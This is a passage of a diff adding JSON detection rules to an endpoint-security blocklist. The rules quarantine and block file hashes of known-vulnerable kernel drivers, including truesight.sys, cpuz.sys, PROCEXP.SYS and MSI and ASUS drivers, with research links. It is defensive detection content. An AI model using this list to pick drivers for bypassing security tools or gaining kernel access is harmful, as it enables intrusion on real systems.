+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b40e38733389d14ff29c73c08be4651f09b111e670cca1574961ff35bbbb93c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "89c541d7-99a3-57cf-b501-544b4244c894",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473719Z",
+ "creation_date": "2026-03-23T11:45:30.473722Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473731Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "08b5f31070e370fbbf4f6e9a99c594c6e33846c82a56c773116705eda3109b62",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "89c72da7-41a0-5396-9bb5-954e3ea8aaa5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160239Z",
+ "creation_date": "2026-03-23T11:45:31.160241Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160247Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a80c261e4dc630c0b8d52eff151b6773eb533b9238163b1e84d9b0c2a8f3d386",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "89c7933e-886d-5123-9a1f-358c0ab0de39",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979168Z",
+ "creation_date": "2026-03-23T11:45:29.979170Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979176Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "98a55dc61046f4509d2465cbc373a9391c07125e5f4a242d2f475f14f32e5430",
+ "comment": "Vulnerable Kernel Driver (aka elrawdsk.sys) [https://www.loldrivers.io/drivers/205721b7-b83b-414a-b4b5-8bacb4a37777/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "89c93e0e-0e92-5af5-b8f0-a297a779ee5c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472637Z",
+ "creation_date": "2026-03-23T11:45:31.472641Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472649Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "273d62b62ee2470aed571001f0385341ba2b1bcbe035a8395870c468def80daa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "89f9408f-7386-57ce-af81-d4c1bb0efa43",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479764Z",
+ "creation_date": "2026-03-23T11:45:31.479768Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479778Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c149713a1c40a9cb2cbbd5846eefffa0784a07a80bf56c2138865aaa9fba4d6d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a0a9d9e-505c-54fd-9867-65a9ee49dcac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823016Z",
+ "creation_date": "2026-03-23T11:45:30.823018Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823023Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "096e1641d26aa971dabc7de17c0259d3aa922091e38928ba7847e4ead64b7f41",
+ "comment": "Vulnerable Kernel Driver (aka SysInfoDetectorX64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a0b331e-b806-56e3-aecd-b7dfe55bbf3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.498911Z",
+ "creation_date": "2026-03-23T11:45:31.498914Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.498922Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de5287a3a9d675859bda7b5c6a9a6877f9065068e7949f0cfcbb353426afcb9e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a128f54-7502-50e9-9dd8-b750f196d90d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483816Z",
+ "creation_date": "2026-03-23T11:45:31.483820Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483830Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26407df9f689b6dfed3be1bf1c617fdc6f75608b0c9cfc8b214db284c3aa6b8f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a26649e-8f69-5d39-b33e-04536a061794",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160136Z",
+ "creation_date": "2026-03-23T11:45:31.160138Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160143Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e7933b183cc69a05911e9612d3e3b1f743d3f666c548cacb6d3cf8699a6f0ebb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a2ebcd9-f8ba-5958-ae84-9fbbd2339601",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605825Z",
+ "creation_date": "2026-03-23T11:45:29.605827Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605833Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d1e5ca66ead46af21b7efb2229ad2901cc0017824e811990de8e5098696ae36a",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a3e90db-b3b0-5e24-bf49-463a461ea9cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810540Z",
+ "creation_date": "2026-03-23T11:45:31.810542Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810547Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d6b6eec472134d99daf1c14a0104e87a5b269f529467abba9a5429228149995",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a504a5f-4195-5ae1-9e3a-beabad199a55",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819036Z",
+ "creation_date": "2026-03-23T11:45:30.819038Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819044Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "88188ebb2dd61397d816274645cce6044489675a52d835faf518b2d137e0604c",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a5247bc-836d-5869-86ad-d85ce0c8d123",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614805Z",
+ "creation_date": "2026-03-23T11:45:29.614807Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614812Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a548938-e7ea-57f5-a7d3-7f2361fa98ad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820490Z",
+ "creation_date": "2026-03-23T11:45:31.820493Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820500Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6bec424bd6775c3ebc57fe1c6fe1d280e3f82d5b104eec2a75771bdfdff99148",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a5ff61e-9eab-56df-8e94-dd96c61ebfed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457306Z",
+ "creation_date": "2026-03-23T11:45:30.457310Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457319Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ee89c1e8738d465d241630ccca4ce218afc02421461e6de91e4dc8133e9501c",
+ "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a635413-e89c-58fc-9d02-d1950fb34df0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613101Z",
+ "creation_date": "2026-03-23T11:45:29.613103Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613108Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b9a4e40a5d80fedd1037eaed958f9f9efed41eb01ada73d51b5dcd86e27e0cbf",
+ "comment": "ASUS vulnerable UEFI Update Driver (aka AsUpIO64.sys and GVCIDrv64.sys) [https://codeinsecurity.wordpress.com/2016/06/12/asus-uefi-update-driver-physical-memory-readwrite/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a7601fe-2e2b-55ca-a611-56aeb43c5c39",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829838Z",
+ "creation_date": "2026-03-23T11:45:31.829841Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829850Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "69963e7c2ac52f1d796e40f9907056f574a93c973371e735e9d8436c7be9c565",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a84ec23-4eaa-56e3-bb1d-dfd46932604c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808358Z",
+ "creation_date": "2026-03-23T11:45:31.808360Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808366Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39eb433dcde3f3852be94f1cf39f125fdffdea0aaada2ff11d8b6004f518f22c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a88477f-20e6-5e32-937f-d16992068a3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.161038Z",
+ "creation_date": "2026-03-23T11:45:31.161041Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.161046Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26f46b7d452c0ec33e6bbfd1a4d8a5cf5cf1192163cd9bdff14fc2fec9168033",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a8caf00-804c-550a-b509-3be504ca5c73",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825577Z",
+ "creation_date": "2026-03-23T11:45:30.825579Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825584Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "695b606b4b9ee6b825c57d4c6f869a9c076dc413301ef615f15b11dba5257320",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a8e0035-65ca-5687-a767-93737a9ccae0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828204Z",
+ "creation_date": "2026-03-23T11:45:30.828206Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828211Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f882326961c4ec155a5b2b049bb663a75732e77073562bc17d98fab8368e4c1a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8a92efbb-6a3b-52b5-af3f-f3bc92866646",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480598Z",
+ "creation_date": "2026-03-23T11:45:30.480600Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480605Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6945077a6846af3e4e2f6a2f533702f57e993c5b156b6965a552d6a5d63b7402",
+ "comment": "Vulnerable Kernel Driver (aka PDFWKRNL.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
